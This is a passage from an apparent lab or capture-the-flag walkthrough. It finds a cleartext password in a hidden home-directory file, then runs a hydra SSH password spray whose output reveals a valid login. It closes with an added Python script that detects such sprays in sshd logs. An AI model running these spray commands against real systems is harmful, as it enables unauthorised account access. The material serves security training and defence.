matthewa
Checking the home directory of the matthewa user after making the lateral movement
matthewa@onlyrands:~$ ll
total 52
drwxrwx---+ 4 matthewa freelancers 4096 Apr 8 11:30 ./
drwxrwxr-x+ 7 root root 4096 Jun 7 2024 ../
-r--------+ 1 matthewa freelancers 120 Jun 7 2024 .~
-rw-rwxr--+ 1 matthewa freelancers 220 Jun 7 2024 .bash_logout*
-rw-rwxr--+ 1 matthewa freelancers 3790 Jun 7 2024 .bashrc*
drwx------+ 2 matthewa freelancers 4096 Apr 8 11:30 .cache/
-rw-rw----+ 1 matthewa freelancers 119 Jun 7 2024 .gitconfig
-rw-rwxr--+ 1 matthewa freelancers 807 Jun 7 2024 .profile*
drwxrwx---+ 3 matthewa freelancers 4096 Jun 7 2024 work/
There is an interesting file, .~, in the home directory of the matthewa user
.~
matthewa@onlyrands:~$ cat .~
Dach's password is "RefriedScabbedWasting502". I saw it once when he had to use my terminal to check TeamCity's status.
The .~ file contains a CLEARTEXT credential of Dach
Which user account belongs to Dach cannot be identified from the note, but a password spray attack can be conducted
Password Spray
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ hydra -t 64 -L ./users.txt -p RefriedScabbedWasting502 ssh://onlyrands.com
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-08 13:34:27
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:16/p:1), ~1 try per task
[DATA] attacking ssh://onlyrands.com:22/
[22][ssh] host: onlyrands.com login: briand password: RefriedScabbedWasting502
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-08 13:34:31
Dach was the briand user
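From the defender's side, the spray above shows up in the sshd authentication log as one source failing once against many accounts within seconds, followed by a single accepted login. The following is an added example, not part of the original write-up, that flags that pattern; the log lines, source addresses, `userNN` names and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (not from the page): one source walks a user list
# with a single guess per account, and one guess is accepted.
SAMPLE_LOG = "\n".join(
    [f"2025-04-08T13:34:{27 + i % 4:02d} onlyrands sshd[{2100 + i}]: "
     f"Failed password for user{i:02d} from 192.0.2.10 port {40000 + i} ssh2"
     for i in range(15)]
    + ["2025-04-08T13:34:30 onlyrands sshd[2200]: "
       "Accepted password for briand from 192.0.2.10 port 40100 ssh2",
       # Benign noise: one user mistyping a password twice from another host.
       "2025-04-08T13:35:02 onlyrands sshd[2201]: "
       "Failed password for matthewa from 198.51.100.7 port 51000 ssh2",
       "2025-04-08T13:35:09 onlyrands sshd[2202]: "
       "Failed password for matthewa from 198.51.100.7 port 51002 ssh2"])

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_spray(log_text, min_users=5, window=timedelta(seconds=60)):
    """Flag sources that fail against >= min_users distinct accounts within
    `window`, and list accounts the same source logged in to around then."""
    failed, accepted = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            bucket = failed if m["result"] == "Failed" else accepted
            bucket[m["ip"]].append((datetime.fromisoformat(m["ts"]), m["user"]))
    findings = {}
    for ip, events in failed.items():
        events.sort()
        start = 0
        for end, (t_end, _) in enumerate(events):
            while t_end - events[start][0] > window:   # slide window forward
                start += 1
            users = {u for _, u in events[start:end + 1]}
            if len(users) >= min_users:
                hit = findings.setdefault(ip, {"sprayed": set(), "accepted": set()})
                hit["sprayed"] |= users
                hit["accepted"] |= {u for t, u in accepted[ip]
                                    if abs(t - t_end) <= window}
    return findings

if __name__ == "__main__":
    for ip, f in detect_spray(SAMPLE_LOG).items():
        print(ip, len(f["sprayed"]), "accounts sprayed; accepted:", sorted(f["accepted"]))
```

Any account listed under `accepted` should be treated as compromised and have its password rotated.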
Validating the credential against the target SSH server